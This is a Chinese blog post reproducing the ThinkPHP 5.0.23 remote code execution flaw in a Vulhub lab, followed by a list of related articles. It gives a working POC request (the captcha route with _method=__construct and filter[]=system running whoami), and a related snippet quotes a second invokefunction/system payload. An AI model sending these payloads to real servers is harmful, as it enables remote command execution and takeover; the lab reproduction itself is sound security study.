ThinkPHP5 5.0.23 远程代码执行漏洞

最新推荐文章于 2024-04-26 15:43:37 发布
最新推荐文章于 2024-04-26 15:43:37 发布
阅读量653 收藏 1
点赞数
分类专栏: 已有的事后必再有 文章标签: 安全 php 开发语言 web安全 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Gjqhs/article/details/123367093
版权

ThinkPHP是国内使用极为广泛的PHP开发框架。在其 5.0(<5.0.24) 版本中,框架在获取请求方法时,对其进行了错误的处理,使得攻击者可以调用 Request 类的任意方法,从而通过特定的利用链导致 RCE 漏洞。

环境设置

Vulhub 靶场下载使用_Gjqhs的博客-CSDN博客

进入对应目录

cd /home/vulhub/thinkphp/5.0.23-rce/

也可以一步步来

输入以下命令:(ThinkPHP版本:5.0.23)

docker-compose up -d

如果有问题可以试试重启稻壳

systemctl restart docker

 访问http://your-ip:8080,将看到 ThinkPHP 的默认页面。

POC

发送数据包并修改URL后执行命令id

http://IP:8080/index.php?s=captcha
_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=whoami
复现成功

burpsuite抓包  也可以

 

 

告诉桃花不用开了
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ThinkPHP 小于 5.0.24 远程代码执行高危漏洞 修复方案
易天海
06-09 1709
https://yq.aliyun.com/articles/686397
ThinkPHP 5.0 远程代码执行漏洞分析
02-21
ThinkPHP 5.0 远程代码执行漏洞分析
TP5漏洞
Bul1et的博客
12-28 8622
漏洞POC /index.php?s=index/\think\app/invokefunction&amp;function=call_user_func_array&amp;vars[0]=system&amp;vars[1][]=whoami&amp;tdsourcetag=s_pctim_aiomsg Poc2 /index.php?s=index/\think\app/invo...
thinkphp5.0.23漏洞复现以及脚本编写
最新发布
weixin_45653478的博客
04-26 810
ThinkPHP5.0.23漏洞主要涉及远程代码执行(RCE)的安全隐患。这一漏洞的存在是因为ThinkPHP框架在底层对控制器名的过滤不够严格,导致攻击者有可能通过特定的URL构造,调用到框架内部的敏感函数,进而执行任意命令。
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
qq_67473072的博客
07-13 3755
Thinkphp v5.x 远程代码执行漏洞复现及POC集合
漏洞复现----38、ThinkPHP5 5.0.23 远程代码执行漏洞
七天
06-29 1659
ThinkPHP 5.0.23远程代码执行漏洞
ThinkPHP5.0.23 远程代码执行漏洞
夜星空如海的博客
09-30 1820
ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞
ThinkPHP5远程代码执行高危漏洞(附:升级修复解决方法)
Small_Operation的博客
03-18 2163
漏洞描述 由于ThinkPHP5框架对控制器名没有进行足够的安全检测,导致在没有开启强制路由的情况下,黑客构造特定的请求,可直接GetWebShell。 漏洞评级 严重 影响版本 ThinkPHP 5.0系列 &lt; 5.0.23 ThinkPHP 5.1系列 &lt; 5.1.31 安全版本 ThinkPHP 5.0系列 5.0.23 ThinkPHP 5.1系列 5.1.31 ...
关于ThinkPHP 小于5.0.24 远程代码执行高危漏洞 修复方案
q469587851的博客
03-28 1096
漏洞描述 由于ThinkPHP5.0框架对Request类的method处理存在缺陷,导致黑客构造特定的请求,可直接GetWebShell。 漏洞评级 严重 影响版本 ThinkPHP 5.0系列 < 5.0.24 安全版本 ThinkPHP 5.0系列 5.0.24 ThinkPHP 5.1系列 5.1.31 安全建议 升级ThinkPHP安全版本 修复方法1.打开 \thinkphp\...
ThinkPHP5.0.24 Request.php 远程代码执行高危漏洞 修复
qq_40880022的博客
04-10 919
修改文件 thinkphp/library/think/Request.phpThinkPHP 5.0系列 < 5.0.24。ThinkPHP 5.0系列 5.0.24。ThinkPHP 5.1系列 5.1.31。
ThinkPHP 5.0.23 远程代码执行 漏洞复现
Senimo
05-01 4618
ThinkPHP 5.0.23 远程代码执行一、 漏洞描述二、漏洞影响三、漏洞复现1、 环境搭建2、 漏洞复现四、漏洞POC五、参考链接六、利用工具 一、 漏洞描述 ThinkPHP 是一款运用极广的 PHP 开发框架。其 5.0.23 以前的版本中,获取 method 的方法中没有正确处理方法名,导致攻击者可以调用 Request 类任意方法并构造利用链,从而导致远程代码执行漏洞。 二、漏洞影响 ThinkPHP <= 5.0.24 三、漏洞复现 1、 环境搭建 使用 Vulhub 在服务器上搭建
ThinkPHP5 5.0.22/5.1.29 远程代码执行漏洞
zeroc009的博客
02-15 637
漏洞简述 ThinkPHP是一款运用极广的PHP开发框架。其版本5中,由于没有正确处理控制器名,导致在网站没有开启强制路由的情况下(即默认情况下)可以执行任意方法,从而导致远程命令执行漏洞。 影响范围 受影响的版本 ThinkPHP 5.0.x < 5.0.23 ThinkPHP 5.1.x < 5.1.31 不受影响的版本 ThinkPHP 5.0.23 ThinkPHP 5.1.31 复现过程 phpinfo、命令执行 http://192.168.1.7:8080/index.php?s=
ThinkPHP 5.0.0_5.0.23 RCE 漏洞分析1
08-03
然而,在 ThinkPHP 5.0.0 到 5.0.23 版本中存在一个 Remote Code Execution(RCE)漏洞,该漏洞允许攻击者在服务器上执行任意代码。 该漏洞是由于 ThinkPHP 的路由机制存在缺陷,攻击者可以通过构造特殊的 URL 来...
ThinkPHP v5.0.23 核心版
10-05
ThinkPHP是一个开源的,快速、简单的面向对象的轻量级PHP开发框架,遵循Apache2开源协议发布,是为了敏捷WEB应用 开发和简化企业级应用开发而诞生的。拥有众多的优秀功能和特性,
thinkphp5远程执行代码漏洞修复补丁.zip
04-17
thinkphp5远程执行代码漏洞修复补丁
漏洞通告ThinkPHP远程代码执行漏洞
05-05
漏洞通告】ThinkPHP远程代码执行漏洞
ThinkPHP 系列漏洞_thinkphp漏洞
2401_83739472的博客
04-12 954
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。attr) : null //进行判断时,需要通过toArray()将getAttr($attr)进行数据类型转换,Output类中不存在toArray()方法,触发 think\console\Output::__call()调用不存在的方法。**一个人可以走的很快,但一群人才能走的更远。薪资区间6k-15k。
网络安全---渗透测试---框架漏洞-ThinkPHP5.0、Struts2
weixin_52796034的博客
11-05 761
反弹shell(Reverse Shell)是一种计算机安全和网络攻击技术,通常被用于与远程目标系统建立命令行交互式连接。这个连接允许攻击者在远程系统上执行命令,获取系统访问权限,以及进行横向移动和数据操作。反弹shell的工作方式如下:攻击者和目标系统之间建立连接:通常,攻击者首先在目标系统上部署一个恶意程序(例如Trojan或后门),该程序会与攻击者的控制服务器建立连接。目标系统反弹连接:一旦恶意程序在目标系统上执行,它会尝试与攻击者的控制服务器建立连接。
thinkphp 远程代码执行原理
01-12
根据提供的引用内容,ThinkPHP远程代码执行漏洞的原理是由于ThinkPHP框架对控制器名和方法名没有进行足够的检测,导致攻击者可以构造恶意请求来执行远程代码。 攻击者可以通过构造特定的请求,利用未正确处理的方法...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值